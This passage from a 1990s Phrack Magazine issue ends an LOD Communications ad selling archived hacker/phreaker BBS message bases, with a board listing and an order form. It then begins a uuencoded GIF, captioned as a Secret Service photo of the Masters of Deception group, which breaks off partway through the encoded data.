  16727. orgasm. Even law enforcement and security personnel would find it helpful for
  16728. demystifying many of the misconceptions of "hackers." For others, it's
  16729. simply fun reading.
  16730.  
  16731. The logs are sufficiently entertaining and useful when each board is
  16732. read individually. However, the power of the collection comes in
  16733. reading them as chapters in a novel, as segments at different points
  16734. in time that combine to give the individual posters and the boards a
  16735. personality. We find ourselves wanting to know more about some of
  16736. these people: How did they resolve their problems? Who was the alleged
  16737. informant on a given board? Can we spot them from the posts? How did
  16738. that poster resolve his problems?  What happened to these people later?
  16739.  
  16740. Many of the logs' posts are flattering, others are less so. To their credit,
  16741. the lodcom editors have left it all intact to let the readers see and judge
  16742. for themselves what occurred on the underground boards. The LOD collection
  16743. provides an authentic look into what went on, and reading them gave us a
  16744. feeling of deja vous all over again."
  16745.  
  16746. *** {End CuD #5.39 Excerpts} ***
  16747.  
  16748.  
  16749. VOLUME #1 CONTENTS:
  16750. -------------------
  16751.  
  16752.  LOD Communications (c) 1993: VOLUME #1 List of Hack/Phreak BBS Message Bases
  16753.  ----------------------------------------------------------------------------
  16754.  BBS NAME           A/C  SYSOP(S)        # MSGS   DATES      KBYTES   PROPHILE
  16755.  ----------------------------------------------------------------------------
  16756.  Alliance BBS       618  Phantom Phreaker  113    2/09/86 -   215       YES
  16757.                          Doom Prophet      G,P    6/30/86
  16758.  
  16759.  Black Ice Private  703  The Highwayman    880    12/1/88 -   560       YES
  16760.                                            P,U    5/13/89
  16761.  
  16762.  Broadway Show/     718  Broadway Hacker   180    9/29/85 -   99        YES  
  16763.  Radio Station BBS                                12/27/85
  16764.  
  16765.  CIA BBS            201  CIA Director      30     5/02/84 -   30         NO
  16766.                                                   6/08/84
  16767.  
  16768.  C.O.P.S.           305  Mr. Byte-Zap      227    11/5/83 -   196        YES 
  16769.                          The Mechanic      G,R,U  7/16/84
  16770.  
  16771.  Face To Face       713  Montressor        572    11/26/90 -  400        YES 
  16772.                          Doc Holiday              12/26/90
  16773.  
  16774.  Farmers Of Doom    303  Mark Tabas        41     2/20/85 -   124        YES
  16775.                                            G      3/01/85
  16776.  
  16777.  Forgotten Realm    618  Crimson Death     166    3/08/88 -   163         NO 
  16778.                                                   4/24/88
  16779.  
  16780.  Legion Of Doom!    305  Lex Luthor        194    3/19/84 -   283        YES 
  16781.                          Paul Muad'Dib *   G,P,U  11/24/84
  16782.  
  16783.  Metal Shop Private 314  Taran King        520    4/03/86 -   380        YES
  16784.                          Knight Lightning  P,R,U  5/06/87
  16785.  
  16786.  OSUNY              914  Tom Tone          375    7/9/82 -    368        YES 
  16787.                          Milo Phonbil *    G,U    4/9/83
  16788.  
  16789.  Phoenix Project    512  The Mentor        1118   7/13/88 -   590        YES
  16790.                          Erik Bloodaxe *   G,R    2/07/90
  16791.  
  16792.  Plover-NET         516  Quasi Moto        346    1/14/84 -   311        YES
  16793.                          Lex Luthor *      G      5/04/84
  16794.  
  16795.  Safehouse          612  Apple Bandit      269    9/15/83 -   251        YES 
  16796.                                            G,U    5/17/84
  16797.  
  16798.  Sherwood Forest I  212  Magnetic Surfer   92     5/01/84 -    85        YES 
  16799.                                            P,U    5/30/84
  16800.  
  16801.  Sherwood Forest ][ 914  Creative Cracker  100    4/06/84 -    200       YES 
  16802.                          Bioc Agent 003 *  G      7/02/84
  16803.  
  16804.  Split Infinity     408  Blue Adept        52     12/21/83 -   36        YES 
  16805.                                                   1/21/84
  16806.  
  16807.  Twilight Phone     ???  System Lord       17     9/21/82 -    24         NO
  16808.                                                   1/09/83
  16809.  
  16810.  Twilight Zone/     203  The Marauder      108    2/06/85 -   186        YES 
  16811.  Septic Tank             Safe Cracker *    G,U    7/24/86
  16812.  
  16813.  WOPR               617  Terminal Man      307    5/15/84 -   266        YES 
  16814.                          The Minute Man *  G,U    1/12/85
  16815.  _____________________________________________________________________________
  16816.  
  16817. NOTES:  In SYSOP(S) column, * indicates remote sysop.
  16818.  
  16819.         In #msgs column, P indicates that the BBS was Private, R indicates BBS
  16820.         was public but restricted access sub-board(s) are included, G indicates
  16821.         that SOME (or maybe all) of the G-files written by the sysop and/or
  16822.         files that were available on the BBS are included, U indicates that a
  16823.         BBS Userlist (typically undated) is included.
  16824.  
  16825.         DATES column shows the starting and ending dates for which messages
  16826.         were buffered (and therefore available) although there may be some
  16827.         gaps in the chronological order.
  16828.  
  16829.         KBYTES column shows size of complete file containing messages, g-files,
  16830.         userlist, etc.  PROPHILE column indicates if a "BBS Pro-Phile" was
  16831.         written and is included.
  16832.  
  16833. LODCOM is currently organizing and splicing messages from over 30 more H/P
  16834. BBSes [shown below] and, as the files are completed and/or as additional
  16835. messages are procured for the above systems, updates of this listing will be
  16836. released.  Modem Over Manhattan (MOM), 8BBS (213), Mines of Moria (713),
  16837. Pirates Cove (516) sysop: BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak
  16838. Klass 2600 (806) sysop: The Egyptian Lover, Blottoland (216) sysop:King Blotto,
  16839. Osuny 2 (a.k.a. The Crystal Palace) (914), Split Infinity (408), The Hearing
  16840. Aid, Shadowland (303) sysop: The ShadowMaster, ShadowSpawn (219) sysop: Psychic
  16841. Warlord, IROC (817) sysop: The Silver Sabre, FreeWorld II (301) sysop: Major
  16842. Havoc, Planet Earth (714), Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217)
  16843. sysop: Jedi Warrior, Demon Roach Underground (806) sysop: Swamp Ratte,
  16844. Stronghold East Elite (516) sysop: Slave Driver, Pure Nihilism, 5th Amendment
  16845. (713) sysop: Micron, Newsweek Elite (617) sysop: Micro Man, Lunatic Labs (415)
  16846. sysop: The Mad Alchemist, Laser Beam (314), Hackers Den (718) sysop: Red
  16847. Knight, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca
  16848. Bandit, The Armoury (201) sysop: The Mace, Digital Logic's Data Center (305)
  16849. sysop: Digital Logic, Asgard (201), The KGB, PBS (702), Lost City of Atlantis
  16850. sysop: The Lineman, and more.
  16851.  
  16852.  
  16853. *** Hacking/Phreaking Tutorials a.k.a. "G-Philes": ***
  16854. ------------------------------------------------------
  16855.  
  16856.    Along with the above H/P BBS Message Bases, LODCOM has collected many of the
  16857. old "philes" that were written and disseminated over the years.  A list of all
  16858. of them would take up too much space here, however, we can tell you that the
  16859. majority are NOT files that were originally written for electronic newsletters
  16860. such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the
  16861. LOD/H Technical Journal).  Those files/newsletters are readily available from
  16862. other sources.  This hodgepodge includes files that somehow fell out of
  16863. widespread circulation.  A Table of Contents of the collection is included but
  16864. the tutorials are all grouped together in four large files of approximately
  16865. 250K each. 
  16866.  
  16867.    UPDATE/ADDITION: A collection of material is being compiled from the H/P
  16868.    BBS Message Bases and Files along with other sources that is an organized
  16869.    conglomeration of all the writings of all the ex-members of the Legion of
  16870.    Doom/Hackers group. It also includes private LOD/H Group sub-board message
  16871.    bases that resided on the LOD BBS (1984), Catch-22 (1985), Phoenix Project
  16872.    (1988), and Black Ice Private (1988) that were NOT included in those BBSes'
  16873.    Message Bases. BBS Messages from before and after each member entered the
  16874.    group along with any files they wrote will be organized, by member name,
  16875.    into individual files. This is being done more for ourselves than anything
  16876.    else as we are curious how much material was created over the years. Note
  16877.    that this special collection of files will be sent to you around the same
  16878.    time that Volume III is sent out and is free for ordering BOTH, the G-Phile
  16879.    Collection mentioned above, and the Message Base Files.
  16880.  
  16881.  
  16882. *** The Order Form: ***
  16883. -----------------------
  16884.  
  16885. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
  16886.  
  16887.                LOD Communications H/P BBS Message Base ORDER FORM
  16888.                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  16889.  
  16890.    PERSONAL RATE:  Volumes 1, 2, 3, and possibly a fourth if created: $39.00
  16891.    This price is total & includes any updates to individual BBS Message Bases.
  16892.  
  16893.    COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
  16894.    Agencies: $99.00  As above, price is total and includes updates.
  16895.  
  16896. H/P BBS Message Bases (All Volumes): $________
  16897.  
  16898. "G-Phile" Collection (Optional): $____________ ($10.00 Personal)
  16899.                                                ($25.00 Commercial)
  16900.  
  16901. Disk Format/Type of Computer: _____________________________________
  16902. (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)
  16903.  
  16904. File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
  16905.                     (ASCII [Non-Compressed] add $5.00 to order)
  16906.  
  16907. Texas Residents add 8% Sales Tax.
  16908. If outside North America please add $6.00 for Shipping & Handling.
  16909.  
  16910. Total Amount (In U.S. Dollars): $ ___________
  16911.  
  16912. Payment Method:  Check or Money Order please.
  16913. Absolutely NO Credit Cards, even if it's yours :-)
  16914.  
  16915. By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
  16916. Copyright Laws to not distribute or reproduce, electronically or otherwise, in
  16917. part or in whole, any part of the Work(s) without express written permission
  16918. from LOD Communications.
  16919.  
  16920. Send To:
  16921.           Name: _____________________________________
  16922.  
  16923.   Organization: _____________________________________ (If applicable)
  16924.  
  16925.         Street: _____________________________________
  16926.  
  16927. City/State/Zip: _____________________________________
  16928.  
  16929.        Country: _____________________________________
  16930.  
  16931. E-mail address: _____________________________________ (If applicable)
  16932.  
  16933.  
  16934. PRIVACY NOTICE:  The information provided to LOD Communications is used for
  16935. sending orders and periodic updates to the H/P BBS Message Base Price List.
  16936. It will NOT be given or sold to any other party.  Period.
  16937.  
  16938.  
  16939. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
  16940.  
  16941. Remit To:   LOD Communications
  16942.             603 W. 13th
  16943.             Suite 1A-278
  16944.             Austin, Texas USA  78701
  16945.  
  16946. Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
  16947.                              Voice Mail:  512-448-5098
  16948.  _____________________________________________________________________________
  16949.  End Order File V.2
  16950.  
  16951. LOD Communications: Leaders in Engineering, Social and Otherwise ;)
  16952.  
  16953. Email: lodcom@mindvox.phantom.com
  16954. Voice Mail: 512-448-5098
  16955. Snail Mail: LOD Communications
  16956.             603 W. 13th
  16957.             Suite 1A-278
  16958.             Austin, Texas USA 78701
  16959.  
  16960.  
  16961.                               ==Phrack Magazine==
  16962.  
  16963.                  Volume Four, Issue Forty-Four, File 24 of 27
  16964.  
  16965. ****************************************************************************
  16966.  
  16967. COURTESY OF THE UNITED STATES SECRET SERVICE 
  16968. THE MASTERS OF DECEPTION "MOD" CIRCA NOVEMBER 1990
  16969. GIF87A FORMAT, GREYSCALE
  16970.  
  16971. begin 644 mod.gif
  16972. M1TE&.#=AD &0 ?<      ,8   #& ,;&    QL8 Q@#&QL?'Q\?FQZK2_/O[
  16973. M^^GIZ=C8V,7%Q;.SLZ&AH8^/CWQ\?&IJ:EE964='1S0T-"(B(A 0$       
  16974. M@ " @ "  ("  (   (  @/S__SB @(#_ #@X /S2JO^  *BCHX X (  _X  
  16975. M.  X@                                                       
  16976. M                                                            
  16977. M                                                            
  16978. M                                                            
  16979. M                                                            
  16980. M                                                            
  16981. M                                                            
  16982. M                                                            
  16983. M                                                            
  16984. M                                                            
  16985. M                                                            
  16986. M                                                            
  16987. M                                                            
  16988. M                                         /___*.CJ(" @/\   #_
  16989. M /__    __\ _P#______RP     D &0 0 (_P Q"!PX\,(%@@@3*ES(L"%#
  16990. M"Q C2I18@8*$" \>.( P88($"1,J0*Q0D8)(@R@O3(28LJ4%A2T-.IQ)LV9#
  16991. ME!)CZEQI<*4%G4"#!K594ZC1HT8=(EV*DB& IU !+/QYD*C5JRY]^J2 4:.#
  16992. M!@\B7 0ILD+'CA2HIO09]&5"H5?C6HV9\RA/E7>9ZHTI=Z_?OX"7.HWZ]&U*
  16993. MN8@++M4ZLB)&!U\;-(#\@*/)BF?3[JR[-R)0SX!!L\RJ%B=GTUI[,A8=D61I
  16994. MI* #RYY-NS;<A80+)TUL,S1CLX\A2QX.5L)EDJX_GV8:FW1@UG1'KUV.-W7U
  16995. MU:H;O[8KW;;W[^ %X__.C0$I;Z7?(W+5.#ER^\D1)ERFGCUOY^W@NYMFCO_Z
  16996. MQ/H](9?<7_JA%EZ!X26HUWB$E6?>>8;E9T$%$K#'P&3#";=1?";1YY^'W"FX
  16997. M7W3\*<?6=0$*V%^(FZWXG(LBQLB70KE))1Z$ MWW'VJM30!!9 Q<2!E[8$$@
  16998. M05DJRHB@;4MNUM:)R]U%T4EZ-2>C:GZ!>.5?-))WXWD$VC>163\V$&2&#F04
  16999. M69K&E43!FS#2UJ2<<8[8XHY1XMD:E?S5F9Z?T\VYY5Y=-O@E0C+-))M^/I$T
  17000. MP6-F"@E9FAEY%99\;\(YZ*9.^F8?BBH)R*=W5I+8(J>H'I50C0[NMM"6C*[_
  17001. M]*8$$#P0Z9F35E8K96(=!VBJ?RX8Z(X\IHC<KXL)NF2IP#:[JI>JQB5A:7N^
  17002. MB=&M04JJ:Z5&RK<LLG:&N2BX.K5*VFFC39@DJ>0VZZYRAPW$ZH-8_4GM2!1T
  17003. M1*M[Q W);7RN]2?HD^,63)NYPS:7KJCMPOONPP8G*A"K,+I5;VW2C4E2OAX%
  17004. M-^G'[CG0*WY:\KC=P [[5AO"YY:J[K'!0BQSEJ411+&K%]/)HUF9Y7L1!$"#
  17005. M+%R0#[1),K/1N=PNR@0?+-2):S$<\\Q4PU:SO- .A5C#(TZ)6<\^1R!VI1^;
  17006. MN5%:&:]&W<L54\6T@NDVR7+2!;+]=M5X,WGUQ%F7_YM8!3I75])9A)]UT=AJ
  17007. M#MT 1R*EK7;=,#_M-M>!(YVLR\?>G??F+\;+MZ%:(P8XQJUE6OCI'9,M69 .
  17008. M')FPVO=-2^QT@=+.'7;7!3PY=)SW?N#>&,Q;%8X#4;XSQZBC%78$NQ+WP 3W
  17009. M/JZYYK?/'J["=3Y>G^[U3>[[]^QZ'CRTQ!/$+KX>?012X6\:WE7B$&AFHG5-
  17010. MP[H[RB5[+6KF>PX8+O@ G$UW;$:^\LWM18[2E_IZ)J#V'8Y;QED1["2WJ;A9
  17011. M;EA&01_J/B*?8ZWK?P$,(<W$)SP#'C T@^/@Z=[4. T^BGD?F0^")JBC#!JO
  17012. M.S1,FED.)[8>,@\"8E&?#/]?$[<1LDB$P-(/UD!GP/RD<'V941%+7L:S!7:D
  17013. M<7>"6I64=</HT2\Z.WQ@I<8XQFZAC8C>B]T1D8BJ 2XQ*AB 2!-MR)S!H:Y#
  17014. M2$N@X4(BP2]V*E8ELU?=&F41L8QM2$)+D]A"TL).I8J+;!37\-X(E3C.D8Z+
  17015. ML:/R?(6TQF &)/++8O[2:#+C]6F0*ZD(K8"V*THE,B-F9!;U](;)2&Y18I0L
  17016. MC,4@)"(]8JI#-AQ39M9F2@I6\%ZD424K:T4V?Y%1;$>:83%MB;="P1%,]MN?
  17017. M_^:G/V(J:9I6LYUIJFA('_[(F64$(MH<2<UVBH^ #<(FYRPX02G-LEGWG-#R
  17018. M>"C_MEH!S2N3FDQE '8T=QH4+PRZ)F]\1T_<V1.<WT1AV);YSX$R#V22460$
  17019. MV7G02.X2(:R2Y^8XTU#MF:JC.-EA/RGZK^;U*RP;=<FH4!K"B PFG@OM'4GO
  17020. M)SV.=E2E%<U(#UFINI>.C"XSI2D ;9K02HJT:GF17@X#>5(!3E.?'6NE4-=W
  17021. MD6;FJC)H(>* [JE49S6U,$^E6E2ERA@,JC%P&,,,,[\*1/>U,E=BZ:!8J436
  17022. MLJ;JI@I-C%7/)4BV&C8K23ME=MQ:+/]D9V-G5":_( .T'G[D?6.$)C"CEE2_
  17023. M@@^P3LUIYQA+.L.:%K'.N=SN2 LJ/0&G5Y<II*VR-:3*_UZ6>97RX5$Y"U'/
  17024. M7@FT:!6MRFY7H@_QE*W=LR>67J>GDGZQK:%Z5*V"V+ZQW<IY0/2AI: 8P[UF
  17025. M3RWX(V41?<L4X$HEK6^5'*"<FURIMK<NXRUE<X_[7.L %8@<S!>D5I>M"W%K
  17026. M5ZSC;DQ3VMF3AG>Y>$$P>:-ES= *5D)TN]\?3_NA)YG6O<:]\&HO<-\@RN=1
  17027. M ,76F01:JTB)#)IA1<U8^\B:A@83F>*,$21C=-;S/AC"+0.0J2Z<7 MKN)X_
  17028. M;FZ .L:\14HWQ Q8@)*5G"$U9=2V>E6Q212<X]:.$H=HM%\M-S4^G"(&KN_-
  17029. MH85U+,H7T[>G&::A<S,V4:"!!/^W3D[RDA?09(#J*J^CDW(+6>RA3HH)O*0D
  17030. MKC&I^M>0WGBT\C5I,,D<X;:UF,(:[AK]+! V75V6F18:CI)Q1496XCF9>&R2
  17031. M%FLG2A@G^-16:QNCJ=;EP/8E9E@^;&I3[<<P63#&\U4:@G@F72/]$* @2_*(
  17032. MTT11_!HGN179LY^UN&P=S]>G%P2AB*C7:@>_.GRH3C-T24WK4=MZPPK.-2I)
  17033. MMK'T=35QB21.1LD(TV-_*-G>#C.W4PO?>DLSL6N,Z(*J'=QW*NIW84;NM\5,
  17034. M3:SJB]T:*>JZ$8[G_N%+V>/N+<3ZJJ#/7;,E<P&XMC%,,S0;5)^9JA"[*46D
  17035. MA=_9LI'_9>'#O6V]@U(\/+FT$8-A4MKE!CG:I:YUJJOZ2#=9I)EJ\BK(PF+9
  17036. M[H(<CSR#>''Q:;D9L]KBE:07S>F4QIM33^ U1"T^O^:1,;I2Z!_3E;'Y:'"T
  17037. M)?U3QF2ZJ%5=M9B?T-^*&2QSK;Y%]G:\WMT+-]YQ#>Z4FCL"Z"1Y(HD-Y19^
  17038. MS>PJ;[E/1RIQ&;E=ZH@"\\8CK5CC#GR\>DH8E;&\V)9\\K*1\3K8\8KR'@V3
  17039. M9Z'&>;9UVG@:0SVX<9]1A"(V]T=[W,RJW[F5ESWI"W^^JR87/,DS&\28AC&"
  17040. M.R0[,<7L] 5SZ?4VCCW&IT[[1-M>T;A_>>?M_:UM:_CX7?W*_T9V!?1T0K.[
  17041. M!CE^6L)X1EWC3MHQ=CZAH$]]N+]]R]>+S9JWG6KN675V5B<]_(,3RR,6K?1/
  17042. MPR=^XE=9>>4MZ4<XZY<^[1=Q:*9]\B=[AF8^?C-[Z95_:1-P\69A_C<N !B 
  17043. M:C. /5& 'W%.7Q=GM 5+=;595%06$HAV/+9Z%[@R],>!35%_=W=]CA-DP21%
  17044. M:%=*/F:")_A!H:*"%\$O%\)?_84FE1%!OU&#+8=U%CAOM-1V.QAYLN>%GL)]
  17045. M._5])#&$_*-X/<9-2/@;2HA5/ 1Z03)G<BB'=18!$T@15KA\BI:%!H)C3\=O
  17046. MT2=]/<B#L.9[>^8FC:,[^D.$ J-SD/\FAA1&@$360[.59 IPB0HPATO6'O]D
  17047. M)! W$A(H-2T#B;GW/_D$3GPH&!DHB+BD@7!S9DE($9F2B)_(=6?12#EW- (G
  17048. M;K(FB?PT6TN&B9DX9W%(9T#3$9I5A1VDA/*69AUXBE.S)6Y'B)/DB@EBB Q3
  17049. M.HDG1<A1@'B&BWFG6ORWAJ<!?H!7C)JX9''( "=F$K/X&_ER'&WH4,KE6)+&
  17050. M.UHG2;>&@X,RC6!H?S)F6MI4.MS(,9GB0+]V*2-HC]U67^1(+6%T4>BX %&H
  17051. M;L,!-'>H%8>W/UX$)?58@N%X;Z.UCZE87EUHC0 Y;1W9/Y^(+_+8C7OT83_#
  17052. M3  #C@PY:.O_18J-PI%18Q&T4HG$F"WM439@\3S[!XK+R(R39QU3I7,VQV<G
  17053. M(TNM%SJKF",;^(]^F&&,.";QZ(X0F"_955V9A2E89#+AQ(_<!(*E$T40Z9,6
  17054. MTE\CEE$8M3CQ<Y00$8\\.8H8UI0A>&IKYWZ+YW@GR8K52)AO99<5B'I>V3.T
  17055. MLDARQ2N_U)(E67NK 9-H@8L3\D)>(6)/^%5.=F*C$VL3@9>B2)D/I7]1R7^[
  17056. MARY9!G]V$E\\9Y* Z(.M:)BW])0W-V3&X8X'J2\>UC[G!%/#I)JRPU:V&%:C
  17057. M029>I6Z=N2V?^1&!II$L5)K6YY$[U6C60XKQQWEI!YOYN&^S28U9_]E8VR.9
  17058. M&JD\/F=N7^DC"5=\;:)LG")5E@F!;@,<P-8OGIE=G:8I\O58J==TT::=>@E(
  17059. M?1F8:)DLLN&/*/F*=S(LBBB T^DFY@9%F.(1#*@^H 2?Q_0X$LH^5 $<=S59
  17060. M7Q5$NE63*[D[\%:$JT8W[86=!*JB*1.;MPD8"FJ;V#:@LE:9IJ-"ZXFA*V23
  17061. M\7F"IL,^K@&BFXDF)'>,A<-!>6::VF&#>Y=]ML.+[U4_5!9_,FH;-6J5^H:C
  17062. MN[B32TJARJ.>\AB/I5B<.WF<[VBDPH&D14.6$DH6NDAYFG>@S#6E NJ4J[=V
  17063. M^/<=6WI_^O9C"9-")>JC[0.!'L2?$P>/[/^#="#&+PMGA[*(/$VJ8N9)G/!W
  17064. MIG*G5'_Z+HCID"Z95=GE85]YJ"6!)%-9=X34/M.)AV6B;FP2:IK467M"IUFJ
  17065. MJ=7749WZ,+9J7(1ZH6':F[P9:F%8H.(HH7#"E?NR)L0661U:J9SUH!S7A]QY
  17066. M/JWI6[OJJ3=82G&J6Q0Z%H>Z2<0:)ASY<AJ3C;+H(VU*6<HWD&UQJKU:'7HG
  17067. M.]]95MFZJ?*J7K"X5OW3FQBJ0F\HD_GUCM/S,N&:E+BJEJD$ENM:--#:?Q%Z
  17068. MAN*5FGSW71&&I78Z:[YSK[07H$#8>_U*./_*53TDL/E%A/?!=>H#6WA4K (H
  17069. M5V62)M#3%'TRG][_$J6H5+%G6:=7FK%:R#D<>R4ORG$L^7L<](:&FC[ZPDA*
  17070. M:4.J5**_66#58UA?0Y,4<!AUU$#T24]&U(O9AH]96J]B^RY!VZ4*RZ^8X97_
  17071. M:J'&MD ^PU5,NS%2JQ,)=#C%%DLN*Y^#LULRD;4=>HM<JT9>&VL]6[ACZYIF
  17072. M%9Y8V7D^9J5#RWSHH[8^NDI%=Q;GEZ&)F&)V0:@KQ4S &DJG9(AFBG%^NZ,+
  17073. M](D(FFCE>II*,XI6JFU_6)4'Y+%\:HI>*SAX^;8+Q$^D6F0G&S [!+KOBI!D
  17074. MA$X< 2XW1YT'44<'J;MR"J/YJ)'H2J7?":./F[ 5-YA<6G?S6ES)RT)O_WM^
  17075. M/N2CTK4^+PE9?@)RJ8-P9#2S.D)W?,$=W=B;B/J@XKB&J#6&51>X7IJJZE6V
  17076. M@E:M9VEU,'E;MW6Y))NAR+.,ZT6H[$M&KO.^N1F_3MN\AVK!&CJU^(NG08B;
  17077. M*[IQ[L)4BKN@3;.M&ORQ7A.^EK5!5K28#FBX/?FVK62112*G/[B3[X>U%6S!
  17078. MXAJAM/N0$QM?^X>;\>J7J"A'V@NH]UB9\!:Z.CFI*HQBIW.Z[HJX!%:WK.0 
  17079. M<;D19(F\L8BI@ I9%MR\FP2D+FJ""(:SL$C$)BQI]@+ _:LQ/MDKTXN=9QNG
  17080. M*]N R7.I$FQ'%6(F3[:;"WG"D:C#G^%S8TR_!/_K:%?:;!F&HX;[J9@J2> I
  17081. MNPVIHZLT4#QJQM8II&BA0%),I)>*+(UQP3\7,AQ!.&5YOVW<M\,[I#S\H[3;
  17082. MR-U7I;47R?N*?;G*8);\(M6RK(277601.6>[5X<7KCRJ/&A$<#OAQZ#$GKEB
  17083. M)&Z[9Y>LR^7R-.GY2T-:.-2LA@\Y7&5VPF2;Q"0(BA[C+U"F<DYJ)3,H*J:<
  17084. M.6=,593VR58$S-(L1(I8S<Q,NJ_<O&),I&BXE!-L1.$LI>XRC4[D&, 6=NF\
  17085. M6<7<S-J$P4E5R*1AD M\<%N%H1'K:*U,P8<\QO^,J $-Q"0=@-6T@_GA,PO-
  17086. MT)75Q>L\0XA\D&(LO +_#:"(_)7\E,<:3=-Q/,F&3+<276ZR#"(E7=2"RH7A
  17087. M22J8<4B#%\SQP4<OO2(Q/9VSF(L$=W0J:+(\5&P=0=*"\=%!;;3/>V7D>(1&
  17088. M/<'>R<8GA="VH5*C-W2V-6 U_:X1[2M6G<,!$L50-J&X%51%$TT$";^J M:S
  17089. M.)\^BKKZNL%W?=9?VK,NIG5L_;I(];0N-9?1;&PTO<_8/&7>C'4II5]%]D-Y
  17090. M-18@\9,(J$@U>7B"G12$O8T7?9G&^LVEQ=@^#<-&/(@A910!TQ8(N5^631DM
  17091. M#=7]FR7;U-/$B55^+9P5XF;K:RFAS*2K#1<?S9::!*>(;=;1[<NTK:>V'5^1
  17092. M_XU4RKR3A[J"1TK#A/?4$\V4I?S">?NRV@2S85?:/R)4_319S$UD&4G10S'=
  17093. M5W1T7RF9(BBM;)C/U[C=F2?0(/C=+N&3_<V59,RVKVJ1Y]W?9ZP:3_2P3JRW
  17094. M6NN502,<;PK,, @D%W+?E97?M[O?0-VJU2V//NUP&M[-OV/@O+.72&Q>V[O@
  17095. M"A2W"93(!Q<RM>68&,[$/@?=-TR&R0><KZI1Y/U?;TF7\AT6)GY[@RUEA?VW
  17096. M>J5F+?;>DEFN ?FD B[C(>D0N3W=^(P\1C:FAD,DYUU\ZY2+4YU?7DS CA)#
  17097. M8)GD[7; E(C*W7(X@'W47RUE'13+G/1^]J;E P[/*O_IY:-\UO5A$V,>%.KW
  17098. M2:)==+IE9WH\G**YL&.LN1+,AJD$O Q>YY;2+0JTNW=%=!0:Y9J-XL;2E;&\
  17099. MZ..H,9ZDY8C^36DJO;!N=8Y.'O<71HS49@C'4I YK*E7>XHIT\6=X3A\KO@R
  17100. ML!TQWZ2.C.,+X?3]GE\NY>81P]LLT@/];K1(Z[7>Y9_>DA);TKL>3T^#/+$E
  17101. MJEX7S$%E1CXWCSMR[(O,14!<P&TR*_<M1O_"55-H=!TM+)]-O]P<B>ARAELY
  17102. M)2J*O1$VD'K[D.=^<;P=19(^<DG:B?=\1RQTITM8Y1G<V0$(D].%*6.1YE_1
  17103. M7VRB+VW[G]/*)='ZVE?>BP?_KX@)7ZMHR/ MX_ O"_$U$5)*"7)E46F0FB%$
  17104. MY6:\>^FJ#L6T/J<F&-&/HL6MXSY!]"-RMFD;L=7%!]M%G.V ?CJY/E7@CO#O
  17105. M/>YC'] F,KW77M*%:>,88)"-B#[A1QS#!D0P"&=W5MIC+;U%>ZKSFYI(N#_Z
  17106. M!0$-0)'/@XRV=4Y"N2%PYIZLI'PG3JX'&_/&.40X%/8T7_:FUS/_K:E%J_!@
  17107. M'O%.Y?895/%.*"1$1]\>$]< ?ZX;.>L1FRG+3(XPB5L,D(FM\V:>EI M19/%
  17108. M=TZ689YZTZ^1__4N5(*S[O"KF\(3^G=YQ>)O\^E?#,1$42,.P,VC+_1R;_J(
  17109. MD^<"_]5N#2XK=B6I]!ZQ,T72Y=95M?\/"G#[D[A2#USM*V@VEX+7VEW=ETG\
  17110. M^!)$,)X[2]_.A.0^ "%!8 0)$2 0G)!0804+%BX\A!A18D.*%BHPK)C1(D:-
  17111. M'3UVQ!!2Y$B2(@&<1 G@@02%$RI$;/BP8@4*$PH^<-! 9P,&#!HX>! APH,'
  17112. M$(SFU D4X<6/% 06A%#494V7%RE<O<CQXU:*,KE>G" 40H,%__XI8"!484&Q
  17113. M48GBW/DSZ%,)$!@L^.D@ H6N%V)*!!Q8L-^-5ZFVU,I58X4)12'PS2@SZV3*
  17114. ME1M.IIBUYE.AG0T>I"MP @6&@P%G9JI8]>J_%TJ^)ID2I?\#EE@=0OP[<_-0
  17115. MI'$;.#8*W$%/N1%<<G7*6:@$PQPML_[H]2/CL%%S*C"KH(':A#???L])7"G;
  17116. MH7=]^I2 T:MI]H%I&FZ9D#3TQ1'R3M HN?)^S!M36X1/.<\Z"XVET6YKCS#_
  17117. MZ&.P(XA@@Q #V4YJ(*'4!-/-)MX<X# NX$ K:#B?'(!@M,1N*RP^A9K+"D$%
  17118. M&X2.)H&LRVD!&QF X*FUB.K0MQ&5^BPJ\\Q[ ++6"$MP,  -.VPA&"FB ((%
  17119. M>DHOLA?_\X^_RYR#KSL!!US.0",37*W%)W'K2Z8(89L0  <L5"^P#&_BL,>D
  17120. MW@(Q J1(K.I$_?C3$J8G8TP.)SO_23300 TAZ+ G1_,R*M+@[K+1QC<K$C1)
  17121. M#-]CDLD3&8QRRK02DVZCF0#%Z#].U_H23-'F.U))U<R$$<TC+5CSM3;GLM#%
  17122. M4C6SJ2X.OR-V/#J!JC(_6S/2<M L]_MJ@J. ^BY'P]ABB4Z>'!TQJ" G54"!
  17123. M!<2]U,I8-?6OTTX_I8^"!\1=X#%S8<1RR6 '"K- NHY+TS3%ZJVU5.ER+6G7
  17124. M,/DZ#36:@N6-J. <>XN@8Q_ S\%E3WV/5GH[;0E6CQAC-"=JBT+H6J.RY<TW
  17125. MN0X:"K@'& AW7.TD4/;<)--=M[]!W8577DQ?I*_>A4,C4,=[==2*S*_8I6_9
  17126. M@0D>R6 "_^<3=,NAH<+3K>!8[LZMO93]$ZO*;).3-4X#K$WGS*3M;:?Q1KNJ
  17127. MNC#=>FM8T!HFJ@'LX$4K@@LG\I5,S3SEJFI4:7K7QL=TMC4U@,$&\&@5Y3L,
  17128. MV^/0=58UP*N&.NH),1B0.1>WI/S>(!V65.*UU/(3-ZI$6Y&RP('>BCH584>,
  17129. M60D<J+12XGA5R*"B4/;,J.6$K_,!O<_RW>\X,]7T3X8T]LAP5"EP %Z*2?NO
  17130. M\5293C/%A<;F>"#1,<^\<.B?[ES"ST/G?B8O1].P+>L^9#E??F/=**Q\T^X7
  17131. M[?ZU&\_@2U$FFHD$R&*CF%'J)R *"TZ\!:8!'24OR@M7=GP"@?^+1.]%[,D<
